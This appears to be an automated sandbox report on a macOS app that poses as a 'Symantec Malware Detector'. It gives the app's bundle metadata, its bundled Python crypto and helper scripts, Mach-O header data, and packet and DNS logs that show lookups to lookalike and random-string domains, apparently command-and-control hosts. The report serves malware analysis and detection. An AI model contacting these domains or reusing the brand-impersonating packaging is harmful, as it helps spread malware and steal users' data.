SHA512:e63c4e7c6bd12391e1ee4d2cdc771b65863b32bf22cb7500c3b8515ca988c95adb36e450518bb42ee2287049a6c9f86e79a0cd0fbc4dee2ca3b8e65a677e0861
File Content Preview:PK.........SsK..5.........C...Symantec Malware Detector.app/Contents/_CodeSignature/CodeResources..[..H...7.bvj.&."..qk2Y....*.f.Bh..47A.....I&...d....'.......t.9}.nk[g....:o..%...8*..G.{>.7_S..._\.......q.ZF...&L.....FQ.u-....=.txq|.i.h.w~v..C.........J*

Static App Info

General Informations

Package Info:
Property List File:<?xml version="1.0" encoding="UTF-8"?><!DOCTYPE plist PUBLIC "-//Apple//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd"><plist version="1.0"><dict><key>BuildMachineOSBuild</key><string>16F2073</string><key>CFBundleDevelopmentRegion</key><string>en</string><key>CFBundleExecutable</key><string>Symantec Malware Detector</string><key>CFBundleIconFile</key><string>AppIcon</string><key>CFBundleIdentifier</key><string>com.Symantec.smd</string><key>CFBundleInfoDictionaryVersion</key><string>6.0</string><key>CFBundleName</key><string>Symantec Malware Detector</string><key>CFBundlePackageType</key><string>APPL</string><key>CFBundleShortVersionString</key><string>4.7</string><key>CFBundleSupportedPlatforms</key><array><string>MacOSX</string></array><key>CFBundleVersion</key><string>9032</string><key>DTCompiler</key><string>com.apple.compilers.llvm.clang.1_0</string><key>DTPlatformBuild</key><string>8C1002</string><key>DTPlatformVersion</key><string>GM</string><key>DTSDKBuild</key><string>16C58</string><key>DTSDKName</key><string>macosx10.12</string><key>DTXcode</key><string>0821</string><key>DTXcodeBuild</key><string>8C1002</string><key>LSMinimumSystemVersion</key><string>10.7</string><key>NSHumanReadableCopyright</key><string>Copyright 2017 Symantec, Inc. All rights reserved.</string><key>NSMainNibFile</key><string>MainMenu</string><key>NSPrincipalClass</key><string>NSApplication</string></dict></plist>

Resources

NameType
Info.plistXML document text
PkgInfoASCII text, with no line terminators
Symantec Malware DetectorMach-O 64-bit executable
AppIcon.icnsdata
cb.pyASCII Java program text, with very long lines
ch.pyASCII Java program text, with very long lines
Logo.pngPNG image, 2000 x 632, 8-bit/color RGBA, non-interlaced
Logo@2x.pngPNG image, 2000 x 632, 8-bit/color RGBA, non-interlaced
Logo@3x.pngPNG image, 2000 x 632, 8-bit/color RGBA, non-interlaced
pbkdf2.pyASCII Java program text
pyDes.pyASCII English text
Schema.pyASCII English text
Security.pngPNG image, 128 x 128, 8-bit/color RGBA, non-interlaced
sym03_2901.datZip archive data, at least v1.0 to extract
Symantec.pngPNG image, 450 x 450, 8-bit/color RGBA, non-interlaced
Symantec@2x.pngPNG image, 450 x 450, 8-bit/color RGBA, non-interlaced
Symantec@3x.pngPNG image, 450 x 450, 8-bit/color RGBA, non-interlaced
Tick.pngPNG image, 719 x 720, 8-bit/color RGBA, non-interlaced
Tick@2x.pngPNG image, 719 x 720, 8-bit/color RGBA, non-interlaced
Tick@3x.pngPNG image, 719 x 720, 8-bit/color RGBA, non-interlaced
MainMenu.nibApple binary property list
CodeResourcesXML document text
Info.plistXML document text
PkgInfoASCII text, with no line terminators
Symantec Malware DetectorMach-O 64-bit executable
AppIcon.icnsdata
cb.pyASCII Java program text, with very long lines
ch.pyASCII Java program text, with very long lines
Logo.pngPNG image, 2000 x 632, 8-bit/color RGBA, non-interlaced
Logo@2x.pngPNG image, 2000 x 632, 8-bit/color RGBA, non-interlaced
Logo@3x.pngPNG image, 2000 x 632, 8-bit/color RGBA, non-interlaced
pbkdf2.pyASCII Java program text
pyDes.pyASCII English text
Schema.pyASCII English text
Security.pngPNG image, 128 x 128, 8-bit/color RGBA, non-interlaced
sym03_2901.datZip archive data, at least v1.0 to extract
Symantec.pngPNG image, 450 x 450, 8-bit/color RGBA, non-interlaced
Symantec@2x.pngPNG image, 450 x 450, 8-bit/color RGBA, non-interlaced
Symantec@3x.pngPNG image, 450 x 450, 8-bit/color RGBA, non-interlaced
Tick.pngPNG image, 719 x 720, 8-bit/color RGBA, non-interlaced
Tick@2x.pngPNG image, 719 x 720, 8-bit/color RGBA, non-interlaced
Tick@3x.pngPNG image, 719 x 720, 8-bit/color RGBA, non-interlaced
MainMenu.nibApple binary property list
CodeResourcesXML document text

Static Mach Info

General Informations for header0

Endian:<
Size:64-bit
Architecture:x86_64
Filetype:execute
Nbr. of load commands:28
segment_command_64
NameValue
segname__PAGEZERO
fileoff0
maxprot0
vmsize4294967296
nsects0
flags0
filesize0
vmaddr0
initprot0
segment_command_64
NameValue
segname__TEXT
fileoff0
maxprot7
vmsize274432
nsects11
flags0
filesize274432
vmaddr4294967296
initprot5
Datassectname__text
segname__TEXT
reloff0
addr4294973368
align2
nreloc0
flags2147484672
offset6072
reserved20
reserved10
reserved30
size172126
sectname__stubs
segname__TEXT
reloff0
addr4295145494
align1
nreloc0
flags2147484680
offset178198
reserved26
reserved10
reserved30
size1134
sectname__stub_helper
segname__TEXT
reloff0
addr4295146628
align2
nreloc0
flags2147484672
offset179332
reserved20
reserved10
reserved30
size1906
sectname__objc_methname
segname__TEXT
reloff0
addr4295148534
align0
nreloc0
flags2
offset181238
reserved20
reserved10
reserved30
size23898
sectname__cstring
segname__TEXT
reloff0
addr4295172432
align4
nreloc0
flags2
offset205136
reserved20
reserved10
reserved30
size21344
sectname__objc_classname
segname__TEXT
reloff0
addr4295193776
align0
nreloc0
flags2
offset226480
reserved20
reserved10
reserved30
size419
sectname__objc_methtype
segname__TEXT
reloff0
addr4295194195
align0
nreloc0
flags2
offset226899
reserved20
reserved10
reserved30
size3388
sectname__gcc_except_tab
segname__TEXT
reloff0
addr4295197584
align2
nreloc0
flags0
offset230288
reserved20
reserved10
reserved30
size756
sectname__const
segname__TEXT
reloff0
addr4295198352
align4
nreloc0
flags0
offset231056
reserved20
reserved10
reserved30
size160
sectname__unwind_info
segname__TEXT
reloff0
addr4295198512
align2
nreloc0
flags0
offset231216
reserved20
reserved10
reserved30
size1760
sectname__eh_frame
segname__TEXT
reloff0
addr4295200272
align3
nreloc0
flags0
offset232976
reserved20
reserved10
reserved30
size41456
segment_command_64
NameValue
segname__DATA
fileoff274432
maxprot7
vmsize69632
nsects21
flags0
filesize69632
vmaddr4295241728
initprot3
Datassectname__program_vars
segname__DATA
reloff0
addr4295241728
align3
nreloc0
flags0
offset274432
reserved20
reserved10
reserved30
size40
sectname__nl_symbol_ptr
segname__DATA
reloff0
addr4295241768
align3
nreloc0
flags6
offset274472
reserved20
reserved1189
reserved30
size16
sectname__got
segname__DATA
reloff0
addr4295241784
align3
nreloc0
flags6
offset274488
reserved20
reserved1191
reserved30
size568
sectname__la_symbol_ptr
segname__DATA
reloff0
addr4295242352
align3
nreloc0
flags7
offset275056
reserved20
reserved1262
reserved30
size1512
sectname__const
segname__DATA
reloff0
addr4295243872
align4
nreloc0
flags0
offset276576
reserved20
reserved10
reserved30
size960
sectname__cfstring
segname__DATA
reloff0
addr4295244832
align3
nreloc0
flags0
offset277536
reserved20
reserved10
reserved30
size14272
sectname__objc_classlist
segname__DATA
reloff0
addr4295259104
align3
nreloc0
flags268435456
offset291808
reserved20
reserved10
reserved30
size104
sectname__objc_nlclslist
segname__DATA
reloff0
addr4295259208
align3
nreloc0
flags268435456
offset291912
reserved20
reserved10
reserved30
size8
sectname__objc_catlist
segname__DATA
reloff0
addr4295259216
align3
nreloc0
flags268435456
offset291920
reserved20
reserved10
reserved30
size8
sectname__objc_protolist
segname__DATA
reloff0
addr4295259224
align3
nreloc0
flags0
offset291928
reserved20
reserved10
reserved30
size64
sectname__objc_imageinfo
segname__DATA
reloff0
addr4295259288
align2
nreloc0
flags0
offset291992
reserved20
reserved10
reserved30
size8
sectname__objc_const
segname__DATA
reloff0
addr4295259296
align3
nreloc0
flags0
offset292000
reserved20
reserved10
reserved30
size37216
sectname__objc_selrefs
segname__DATA
reloff0
addr4295296512
align3
nreloc0
flags268435461
offset329216
reserved20
reserved10
reserved30
size6968
sectname__objc_protorefs
segname__DATA
reloff0
addr4295303480
align3
nreloc0
flags0
offset336184
reserved20
reserved10
reserved30
size16
sectname__objc_classrefs
segname__DATA
reloff0
addr4295303496
align3
nreloc0
flags268435456
offset336200
reserved20
reserved10
reserved30
size440
sectname__objc_superrefs
segname__DATA
reloff0
addr4295303936
align3
nreloc0
flags268435456
offset336640
reserved20
reserved10
reserved30
size96
sectname__objc_ivar
segname__DATA
reloff0
addr4295304032
align3
nreloc0
flags0
offset336736
reserved20
reserved10
reserved30
size1768
sectname__objc_data
segname__DATA
reloff0
addr4295305800
align3
nreloc0
flags0
offset338504
reserved20
reserved10
reserved30
size1120
sectname__data
segname__DATA
reloff0
addr4295306920
align3
nreloc0
flags0
offset339624
reserved20
reserved10
reserved30
size856
sectname__common
segname__DATA
reloff0
addr4295307776
align3
nreloc0
flags1
offset0
reserved20
reserved10
reserved30
size32
sectname__bss
segname__DATA
reloff0
addr4295307808
align4
nreloc0
flags1
offset0
reserved20
reserved10
reserved30
size928
segment_command_64
NameValue
segname__LINKEDIT
fileoff344064
maxprot7
vmsize40960
nsects0
flags0
filesize40208
vmaddr4295311360
initprot1
dyld_info_command
NameValue
lazy_bind_size5344
lazy_bind_off349248
weak_bind_size0
rebase_size1152
export_off354592
export_size112
bind_off345216
rebase_off344064
bind_size4032
weak_bind_off0
symtab_command
NameValue
strsize7200
symoff355960
stroff362756
nsyms312
dysymtab_command
NameValue
extreloff0
nlocrel0
indirectsymoff360952
modtaboff0
nextrel0
iundefsym2
nmodtab0
ilocalsym0
nundefsym310
nextrefsyms0
locreloff0
ntoc0
nlocalsym1
tocoff0
extrefsymoff0
nindirectsyms451
iextdefsym1
nextdefsym1
dylinker_command
NameValue
name12
Data/usr/lib/dyld
uuid_command
NameValue
uuid728a67fb65143635ab85693323ca7735
version_min_command
NameValue
version657152
reserved658432
dylib_command
NameValue
compatibility_version0.10.0
timestampThu Jan 01 01:00:02 1970
name24
current_version2304.10.0
Data/usr/lib/libxml2.2.dylib
dylib_command
NameValue
compatibility_version0.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version520.1.0
Data/usr/lib/libz.1.dylib
dylib_command
NameValue
compatibility_version0.9.0
timestampThu Jan 01 01:00:02 1970
name24
current_version0.253.0
Data/usr/lib/libsqlite3.dylib
dylib_command
NameValue
compatibility_version0.44.1
timestampThu Jan 01 01:00:02 1970
name24
current_version6400.69.5
Data/System/Library/Frameworks/Foundation.framework/Versions/C/Foundation
dylib_command
NameValue
compatibility_version0.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version0.228.0
Data/usr/lib/libobjc.A.dylib
dylib_command
NameValue
compatibility_version0.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version0.214.4
Data/usr/lib/libSystem.B.dylib
dylib_command
NameValue
compatibility_version0.45.0
timestampThu Jan 01 01:00:02 1970
name24
current_version19200.224.5
Data/System/Library/Frameworks/AppKit.framework/Versions/C/AppKit
dylib_command
NameValue
compatibility_version0.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version0.48.0
Data/System/Library/Frameworks/ApplicationServices.framework/Versions/A/ApplicationServices
dylib_command
NameValue
compatibility_version0.150.0
timestampThu Jan 01 01:00:02 1970
name24
current_version7168.68.5
Data/System/Library/Frameworks/CoreFoundation.framework/Versions/A/CoreFoundation
dylib_command
NameValue
compatibility_version0.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version2311.7.3
Data/System/Library/Frameworks/CoreServices.framework/Versions/A/CoreServices
dylib_command
NameValue
compatibility_version0.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version0.19.1
Data/System/Library/Frameworks/IOKit.framework/Versions/A/IOKit
dylib_command
NameValue
compatibility_version512.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version2816.1.0
Data/System/Library/Frameworks/QuartzCore.framework/Versions/A/QuartzCore
dylib_command
NameValue
compatibility_version0.1.0
timestampThu Jan 01 01:00:02 1970
name24
current_version7682.120.3
Data/System/Library/Frameworks/SystemConfiguration.framework/Versions/A/SystemConfiguration
rpath_command
NameValue
path12
Data@executable_path/../Frameworks
linkedit_data_command
NameValue
dataoff354704
datassize1256
linkedit_data_command
NameValue
dataoff355960
datassize0
linkedit_data_command
NameValue
dataoff369968
datassize14304

Network Behavior

Network Port Distribution

TCP Packets

TimestampSource PortDest PortSource IPDest IP
Nov 21, 2017 13:09:47.799823046 MEZ4920053192.168.0.508.8.8.8
Nov 21, 2017 13:09:47.799869061 MEZ53492008.8.8.8192.168.0.50
Nov 21, 2017 13:09:47.800024986 MEZ4920053192.168.0.508.8.8.8
Nov 21, 2017 13:09:47.806478977 MEZ4920053192.168.0.508.8.8.8
Nov 21, 2017 13:09:47.806555986 MEZ53492008.8.8.8192.168.0.50
Nov 21, 2017 13:09:47.806724072 MEZ4920053192.168.0.508.8.8.8
Nov 21, 2017 13:09:47.871573925 MEZ5615453192.168.0.508.8.8.8
Nov 21, 2017 13:09:47.871607065 MEZ5439353192.168.0.508.8.8.8
Nov 21, 2017 13:09:48.516813993 MEZ53543938.8.8.8192.168.0.50
Nov 21, 2017 13:09:48.532721996 MEZ53561548.8.8.8192.168.0.50
Nov 21, 2017 13:09:49.418050051 MEZ49201443192.168.0.50216.58.198.206
Nov 21, 2017 13:09:49.418092966 MEZ44349201216.58.198.206192.168.0.50
Nov 21, 2017 13:09:49.418415070 MEZ49201443192.168.0.50216.58.198.206
Nov 21, 2017 13:09:49.426422119 MEZ49201443192.168.0.50216.58.198.206
Nov 21, 2017 13:09:49.426440001 MEZ44349201216.58.198.206192.168.0.50
Nov 21, 2017 13:09:50.496921062 MEZ44349201216.58.198.206192.168.0.50
Nov 21, 2017 13:09:50.496932983 MEZ44349201216.58.198.206192.168.0.50
Nov 21, 2017 13:09:50.497560978 MEZ49201443192.168.0.50216.58.198.206
Nov 21, 2017 13:09:50.497580051 MEZ49201443192.168.0.50216.58.198.206
Nov 21, 2017 13:09:50.523032904 MEZ44349201216.58.198.206192.168.0.50
Nov 21, 2017 13:09:50.523500919 MEZ49201443192.168.0.50216.58.198.206
Nov 21, 2017 13:09:50.572896004 MEZ49201443192.168.0.50216.58.198.206
Nov 21, 2017 13:09:50.572917938 MEZ44349201216.58.198.206192.168.0.50
Nov 21, 2017 13:09:50.573133945 MEZ49201443192.168.0.50216.58.198.206
Nov 21, 2017 13:09:50.573143005 MEZ44349201216.58.198.206192.168.0.50
Nov 21, 2017 13:09:50.737159967 MEZ44349201216.58.198.206192.168.0.50
Nov 21, 2017 13:09:50.737582922 MEZ49201443192.168.0.50216.58.198.206
Nov 21, 2017 13:09:50.739198923 MEZ49201443192.168.0.50216.58.198.206
Nov 21, 2017 13:09:50.739216089 MEZ44349201216.58.198.206192.168.0.50
Nov 21, 2017 13:09:51.137543917 MEZ44349201216.58.198.206192.168.0.50
Nov 21, 2017 13:09:51.137557983 MEZ44349201216.58.198.206192.168.0.50
Nov 21, 2017 13:09:51.137849092 MEZ49201443192.168.0.50216.58.198.206
Nov 21, 2017 13:09:51.138778925 MEZ6345253192.168.0.508.8.8.8
Nov 21, 2017 13:09:51.138824940 MEZ5572353192.168.0.508.8.8.8
Nov 21, 2017 13:09:51.582664967 MEZ53557238.8.8.8192.168.0.50
Nov 21, 2017 13:09:51.600219965 MEZ53634528.8.8.8192.168.0.50
Nov 21, 2017 13:09:51.652765036 MEZ49202443192.168.0.50216.58.198.193
Nov 21, 2017 13:09:51.652807951 MEZ44349202216.58.198.193192.168.0.50
Nov 21, 2017 13:09:51.652977943 MEZ49202443192.168.0.50216.58.198.193
Nov 21, 2017 13:09:51.653240919 MEZ49202443192.168.0.50216.58.198.193
Nov 21, 2017 13:09:51.653253078 MEZ44349202216.58.198.193192.168.0.50
Nov 21, 2017 13:09:52.515551090 MEZ44349202216.58.198.193192.168.0.50
Nov 21, 2017 13:09:52.515562057 MEZ44349202216.58.198.193192.168.0.50
Nov 21, 2017 13:09:52.515904903 MEZ49202443192.168.0.50216.58.198.193
Nov 21, 2017 13:09:52.515925884 MEZ49202443192.168.0.50216.58.198.193
Nov 21, 2017 13:09:52.548022032 MEZ44349202216.58.198.193192.168.0.50
Nov 21, 2017 13:09:52.548305035 MEZ49202443192.168.0.50216.58.198.193
Nov 21, 2017 13:09:52.557872057 MEZ49202443192.168.0.50216.58.198.193
Nov 21, 2017 13:09:52.557893991 MEZ44349202216.58.198.193192.168.0.50
Nov 21, 2017 13:09:52.558060884 MEZ49202443192.168.0.50216.58.198.193
Nov 21, 2017 13:09:52.558070898 MEZ44349202216.58.198.193192.168.0.50
Nov 21, 2017 13:09:52.752649069 MEZ44349202216.58.198.193192.168.0.50
Nov 21, 2017 13:09:52.752845049 MEZ49202443192.168.0.50216.58.198.193
Nov 21, 2017 13:09:52.754494905 MEZ49202443192.168.0.50216.58.198.193
Nov 21, 2017 13:09:52.754518032 MEZ44349202216.58.198.193192.168.0.50
Nov 21, 2017 13:09:53.134536982 MEZ44349202216.58.198.193192.168.0.50
Nov 21, 2017 13:09:53.134808064 MEZ49202443192.168.0.50216.58.198.193
Nov 21, 2017 13:09:53.135101080 MEZ49202443192.168.0.50216.58.198.193
Nov 21, 2017 13:09:53.135116100 MEZ44349202216.58.198.193192.168.0.50
Nov 21, 2017 13:09:53.135236979 MEZ49202443192.168.0.50216.58.198.193
Nov 21, 2017 13:09:53.135236979 MEZ49201443192.168.0.50216.58.198.206
Nov 21, 2017 13:09:53.135247946 MEZ49202443192.168.0.50216.58.198.193
Nov 21, 2017 13:09:53.135256052 MEZ44349201216.58.198.206192.168.0.50
Nov 21, 2017 13:09:53.135257959 MEZ44349202216.58.198.193192.168.0.50
Nov 21, 2017 13:09:53.135301113 MEZ44349202216.58.198.193192.168.0.50
Nov 21, 2017 13:09:53.135375977 MEZ49202443192.168.0.50216.58.198.193
Nov 21, 2017 13:09:53.135461092 MEZ49202443192.168.0.50216.58.198.193
Nov 21, 2017 13:09:53.135685921 MEZ49201443192.168.0.50216.58.198.206
Nov 21, 2017 13:09:53.135759115 MEZ44349201216.58.198.206192.168.0.50
Nov 21, 2017 13:09:53.135919094 MEZ49201443192.168.0.50216.58.198.206
Nov 21, 2017 13:09:53.212006092 MEZ5498853192.168.0.508.8.8.8
Nov 21, 2017 13:09:53.212028027 MEZ6475253192.168.0.508.8.8.8
Nov 21, 2017 13:09:54.348814011 MEZ5498853192.168.0.508.8.8.8
Nov 21, 2017 13:09:54.348829031 MEZ6475253192.168.0.508.8.8.8
Nov 21, 2017 13:09:54.988450050 MEZ53647528.8.8.8192.168.0.50
Nov 21, 2017 13:09:55.004429102 MEZ53549888.8.8.8192.168.0.50
Nov 21, 2017 13:09:55.422828913 MEZ53549888.8.8.8192.168.0.50
Nov 21, 2017 13:09:55.509746075 MEZ53647528.8.8.8192.168.0.50
Nov 21, 2017 13:09:55.759161949 MEZ49203443192.168.0.5066.70.246.5
Nov 21, 2017 13:09:55.759238958 MEZ4434920366.70.246.5192.168.0.50
Nov 21, 2017 13:09:55.759475946 MEZ49203443192.168.0.5066.70.246.5
Nov 21, 2017 13:09:55.767261028 MEZ49203443192.168.0.5066.70.246.5
Nov 21, 2017 13:09:55.767314911 MEZ4434920366.70.246.5192.168.0.50
Nov 21, 2017 13:09:56.635101080 MEZ4434920366.70.246.5192.168.0.50
Nov 21, 2017 13:09:56.635118961 MEZ4434920366.70.246.5192.168.0.50
Nov 21, 2017 13:09:56.635436058 MEZ49203443192.168.0.5066.70.246.5
Nov 21, 2017 13:09:56.635452986 MEZ49203443192.168.0.5066.70.246.5
Nov 21, 2017 13:09:56.656483889 MEZ4434920366.70.246.5192.168.0.50
Nov 21, 2017 13:09:56.656760931 MEZ49203443192.168.0.5066.70.246.5
Nov 21, 2017 13:09:56.698992014 MEZ49203443192.168.0.5066.70.246.5
Nov 21, 2017 13:09:56.699016094 MEZ4434920366.70.246.5192.168.0.50
Nov 21, 2017 13:09:56.699635029 MEZ49203443192.168.0.5066.70.246.5
Nov 21, 2017 13:09:56.699692965 MEZ4434920366.70.246.5192.168.0.50
Nov 21, 2017 13:09:56.699877024 MEZ49203443192.168.0.5066.70.246.5
Nov 21, 2017 13:10:07.833749056 MEZ5638253192.168.0.508.8.8.8
Nov 21, 2017 13:10:08.731468916 MEZ53563828.8.8.8192.168.0.50
Nov 21, 2017 13:10:08.798295975 MEZ5483853192.168.0.508.8.8.8
Nov 21, 2017 13:10:09.656622887 MEZ53548388.8.8.8192.168.0.50
Nov 21, 2017 13:10:09.709292889 MEZ5437753192.168.0.508.8.8.8
Nov 21, 2017 13:10:10.619075060 MEZ53543778.8.8.8192.168.0.50
Nov 21, 2017 13:10:10.678550959 MEZ5041353192.168.0.508.8.8.8
Nov 21, 2017 13:10:11.827925920 MEZ5041353192.168.0.508.8.8.8
Nov 21, 2017 13:10:12.719142914 MEZ53504138.8.8.8192.168.0.50
Nov 21, 2017 13:10:12.734967947 MEZ53504138.8.8.8192.168.0.50
Nov 21, 2017 13:10:12.742933989 MEZ5368453192.168.0.508.8.8.8
Nov 21, 2017 13:10:13.748517036 MEZ5368453192.168.0.508.8.8.8
Nov 21, 2017 13:10:15.481964111 MEZ53536848.8.8.8192.168.0.50
Nov 21, 2017 13:10:15.498336077 MEZ53536848.8.8.8192.168.0.50
Nov 21, 2017 13:10:22.938214064 MEZ53535353192.168.0.50224.0.0.251
Nov 21, 2017 13:10:23.198354959 MEZ53535353192.168.0.50224.0.0.251
Nov 21, 2017 13:10:23.557614088 MEZ53535353192.168.0.50224.0.0.251
Nov 21, 2017 13:10:23.821778059 MEZ53535353192.168.0.50224.0.0.251
Nov 21, 2017 13:10:24.911015034 MEZ53535353192.168.0.50224.0.0.251
Nov 21, 2017 13:10:27.035947084 MEZ53535353192.168.0.50224.0.0.251
Nov 21, 2017 13:10:30.940601110 MEZ4919780192.168.0.5017.253.37.210
Nov 21, 2017 13:10:30.940742970 MEZ804919717.253.37.210192.168.0.50
Nov 21, 2017 13:10:30.940931082 MEZ4919880192.168.0.5017.253.37.210
Nov 21, 2017 13:10:30.940974951 MEZ4919780192.168.0.5017.253.37.210
Nov 21, 2017 13:10:30.941052914 MEZ804919817.253.37.210192.168.0.50
Nov 21, 2017 13:10:30.941247940 MEZ4919880192.168.0.5017.253.37.210
Nov 21, 2017 13:10:31.182344913 MEZ53535353192.168.0.50224.0.0.251
Nov 21, 2017 13:10:33.523400068 MEZ53535353192.168.0.50224.0.0.251
Nov 21, 2017 13:10:33.838821888 MEZ53535353192.168.0.50224.0.0.251
Nov 21, 2017 13:10:34.139945984 MEZ53535353192.168.0.50224.0.0.251
Nov 21, 2017 13:10:34.523487091 MEZ53535353192.168.0.50224.0.0.251
Nov 21, 2017 13:10:35.595777035 MEZ53535353192.168.0.50224.0.0.251
Nov 21, 2017 13:10:37.600488901 MEZ53535353192.168.0.50224.0.0.251
Nov 21, 2017 13:10:41.732786894 MEZ53535353192.168.0.50224.0.0.251

UDP Packets

TimestampSource PortDest PortSource IPDest IP
Nov 21, 2017 13:09:47.871573925 MEZ5615453192.168.0.508.8.8.8
Nov 21, 2017 13:09:47.871607065 MEZ5439353192.168.0.508.8.8.8
Nov 21, 2017 13:09:48.516813993 MEZ53543938.8.8.8192.168.0.50
Nov 21, 2017 13:09:48.532721996 MEZ53561548.8.8.8192.168.0.50
Nov 21, 2017 13:09:51.138778925 MEZ6345253192.168.0.508.8.8.8
Nov 21, 2017 13:09:51.138824940 MEZ5572353192.168.0.508.8.8.8
Nov 21, 2017 13:09:51.582664967 MEZ53557238.8.8.8192.168.0.50
Nov 21, 2017 13:09:51.600219965 MEZ53634528.8.8.8192.168.0.50
Nov 21, 2017 13:09:53.212006092 MEZ5498853192.168.0.508.8.8.8
Nov 21, 2017 13:09:53.212028027 MEZ6475253192.168.0.508.8.8.8
Nov 21, 2017 13:09:54.348814011 MEZ5498853192.168.0.508.8.8.8
Nov 21, 2017 13:09:54.348829031 MEZ6475253192.168.0.508.8.8.8
Nov 21, 2017 13:09:54.988450050 MEZ53647528.8.8.8192.168.0.50
Nov 21, 2017 13:09:55.004429102 MEZ53549888.8.8.8192.168.0.50
Nov 21, 2017 13:09:55.422828913 MEZ53549888.8.8.8192.168.0.50
Nov 21, 2017 13:09:55.509746075 MEZ53647528.8.8.8192.168.0.50
Nov 21, 2017 13:10:07.833749056 MEZ5638253192.168.0.508.8.8.8
Nov 21, 2017 13:10:08.731468916 MEZ53563828.8.8.8192.168.0.50
Nov 21, 2017 13:10:08.798295975 MEZ5483853192.168.0.508.8.8.8
Nov 21, 2017 13:10:09.656622887 MEZ53548388.8.8.8192.168.0.50
Nov 21, 2017 13:10:09.709292889 MEZ5437753192.168.0.508.8.8.8
Nov 21, 2017 13:10:10.619075060 MEZ53543778.8.8.8192.168.0.50
Nov 21, 2017 13:10:10.678550959 MEZ5041353192.168.0.508.8.8.8
Nov 21, 2017 13:10:11.827925920 MEZ5041353192.168.0.508.8.8.8
Nov 21, 2017 13:10:12.719142914 MEZ53504138.8.8.8192.168.0.50
Nov 21, 2017 13:10:12.734967947 MEZ53504138.8.8.8192.168.0.50
Nov 21, 2017 13:10:12.742933989 MEZ5368453192.168.0.508.8.8.8
Nov 21, 2017 13:10:13.748517036 MEZ5368453192.168.0.508.8.8.8
Nov 21, 2017 13:10:15.481964111 MEZ53536848.8.8.8192.168.0.50
Nov 21, 2017 13:10:15.498336077 MEZ53536848.8.8.8192.168.0.50
Nov 21, 2017 13:10:22.938214064 MEZ53535353192.168.0.50224.0.0.251
Nov 21, 2017 13:10:23.198354959 MEZ53535353192.168.0.50224.0.0.251
Nov 21, 2017 13:10:23.557614088 MEZ53535353192.168.0.50224.0.0.251
Nov 21, 2017 13:10:23.821778059 MEZ53535353192.168.0.50224.0.0.251
Nov 21, 2017 13:10:24.911015034 MEZ53535353192.168.0.50224.0.0.251
Nov 21, 2017 13:10:27.035947084 MEZ53535353192.168.0.50224.0.0.251
Nov 21, 2017 13:10:31.182344913 MEZ53535353192.168.0.50224.0.0.251
Nov 21, 2017 13:10:33.523400068 MEZ53535353192.168.0.50224.0.0.251
Nov 21, 2017 13:10:33.838821888 MEZ53535353192.168.0.50224.0.0.251
Nov 21, 2017 13:10:34.139945984 MEZ53535353192.168.0.50224.0.0.251
Nov 21, 2017 13:10:34.523487091 MEZ53535353192.168.0.50224.0.0.251
Nov 21, 2017 13:10:35.595777035 MEZ53535353192.168.0.50224.0.0.251
Nov 21, 2017 13:10:37.600488901 MEZ53535353192.168.0.50224.0.0.251
Nov 21, 2017 13:10:41.732786894 MEZ53535353192.168.0.50224.0.0.251

ICMP Packets

TimestampSource IPDest IPChecksumCodeType
Nov 21, 2017 13:09:55.423074007 MEZ192.168.0.508.8.8.825bb(Port unreachable)Destination Unreachable
Nov 21, 2017 13:09:55.509942055 MEZ192.168.0.508.8.8.8ffa6(Port unreachable)Destination Unreachable
Nov 21, 2017 13:09:56.789249897 MEZ192.168.0.5066.70.246.521f3Echo
Nov 21, 2017 13:10:12.735137939 MEZ192.168.0.508.8.8.837a7(Port unreachable)Destination Unreachable
Nov 21, 2017 13:10:15.498508930 MEZ192.168.0.508.8.8.82ad1(Port unreachable)Destination Unreachable

DNS Queries

TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
Nov 21, 2017 13:09:47.871573925 MEZ192.168.0.508.8.8.80xc5bcStandard query (0)script.google.comA (IP address)IN (0x0001)
Nov 21, 2017 13:09:47.871607065 MEZ192.168.0.508.8.8.80x490eStandard query (0)script.google.com28IN (0x0001)
Nov 21, 2017 13:09:51.138778925 MEZ192.168.0.508.8.8.80x4e0dStandard query (0)script.googleusercontent.comA (IP address)IN (0x0001)
Nov 21, 2017 13:09:51.138824940 MEZ192.168.0.508.8.8.80xd9f6Standard query (0)script.googleusercontent.com28IN (0x0001)
Nov 21, 2017 13:09:53.212006092 MEZ192.168.0.508.8.8.80xdc00Standard query (0)symantecheurengine.comA (IP address)IN (0x0001)
Nov 21, 2017 13:09:53.212028027 MEZ192.168.0.508.8.8.80x1d80Standard query (0)symantecheurengine.com28IN (0x0001)
Nov 21, 2017 13:09:54.348814011 MEZ192.168.0.508.8.8.80xdc00Standard query (0)symantecheurengine.comA (IP address)IN (0x0001)
Nov 21, 2017 13:09:54.348829031 MEZ192.168.0.508.8.8.80x1d80Standard query (0)symantecheurengine.com28IN (0x0001)
Nov 21, 2017 13:10:07.833749056 MEZ192.168.0.508.8.8.80x7138Standard query (0)symheureng.comA (IP address)IN (0x0001)
Nov 21, 2017 13:10:08.798295975 MEZ192.168.0.508.8.8.80xd392Standard query (0)symeher.coA (IP address)IN (0x0001)
Nov 21, 2017 13:10:09.709292889 MEZ192.168.0.508.8.8.80xfd4eStandard query (0)kio2349329490jfdkf394.comA (IP address)IN (0x0001)
Nov 21, 2017 13:10:10.678550959 MEZ192.168.0.508.8.8.80x26deStandard query (0)klsadkla93242lokiloki.comA (IP address)IN (0x0001)
Nov 21, 2017 13:10:11.827925920 MEZ192.168.0.508.8.8.80x26deStandard query (0)klsadkla93242lokiloki.comA (IP address)IN (0x0001)
Nov 21, 2017 13:10:12.742933989 MEZ192.168.0.508.8.8.80x909dStandard query (0)abrahamlincolnisaliveandrunssymantec.comA (IP address)IN (0x0001)
Nov 21, 2017 13:10:13.748517036 MEZ192.168.0.508.8.8.80x909dStandard query (0)abrahamlincolnisaliveandrunssymantec.comA (IP address)IN (0x0001)

DNS Answers

TimestampSource IPDest IPTrans IDReplay CodeNameCNameAddressTypeClass
Nov 21, 2017 13:09:48.516813993 MEZ8.8.8.8192.168.0.500x490eNo error (0)script.google.com28IN (0x0001)
